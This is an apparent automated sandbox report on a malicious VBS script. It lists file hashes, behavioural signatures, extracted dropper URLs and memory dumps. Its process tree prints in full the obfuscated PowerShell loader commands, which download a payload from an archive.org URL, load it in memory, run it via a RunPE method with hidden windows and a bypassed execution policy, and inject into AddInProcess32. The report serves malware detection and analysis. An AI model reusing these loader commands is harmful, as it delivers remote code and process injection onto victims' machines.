Overview

overview

10

Static

static

1

41eb611519...e7.vbs

windows7-x64

10

41eb611519...e7.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    02/10/2024, 03:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    41eb6115196af3892e27dba0a38c0376900f7d96b0e5721e4383b5e75d7379e7.vbs

  • Size

    112KB

  • MD5

    f182482644ecb63bbc8c1dac4fa0be31

  • SHA1

    e946d969c0f37ae9b56d4851fd1f3dfa79f3c4a9

  • SHA256

    41eb6115196af3892e27dba0a38c0376900f7d96b0e5721e4383b5e75d7379e7

  • SHA512

    f5e1cbe338fb5252a00068a7dcd119f91b5a8d5e766725c609e3a68f1f02c91cc4dabf70ae88457c005f8d8ef592f34336f7e087de2514d6d3b26f4cce04a60e

  • SSDEEP

    768:aNLgVRXrFjNlww2JSTnnLIJhG/Hqgt5pDt5j2GwgvxXy7yPcbE:qqXJZ6STnLIJh8qgt5pz2GwgvxXy73Q

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\41eb6115196af3892e27dba0a38c0376900f7d96b0e5721e4383b5e75d7379e7.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2964
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2760
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2612

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0OP0KCMON1F3DP2AT5XB.temp
    Filesize

    7KB

    MD5

    e65561684c2046d427a072d016b88177

    SHA1

    f7fd32a53360f6b15b9894c46b9a5d7dfae2fd92

    SHA256

    b9cb13e1a43f42ca9f580eedbf1a064d2afbd916f9c3d77c47cc58ccdcd7647b

    SHA512

    c79c18c5cee7176dfda3cbf42b07f6680ef2086446a7fc89bbce0ea14028bafaa254184a6c641f46f13ad1eb7cbb374166922cf998d4caf5973f98f7b578ced8

    Download Submit

  • memory/2760-4-0x000007FEF524E000-0x000007FEF524F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2760-6-0x000007FEF4F90000-0x000007FEF592D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2760-7-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2760-5-0x000000001B300000-0x000000001B5E2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2760-8-0x000007FEF4F90000-0x000007FEF592D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2760-9-0x000007FEF4F90000-0x000007FEF592D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2760-10-0x000007FEF4F90000-0x000007FEF592D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2760-12-0x000007FEF4F90000-0x000007FEF592D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2760-17-0x000007FEF4F90000-0x000007FEF592D000-memory.dmp

    Filesize

    9.6MB

    Download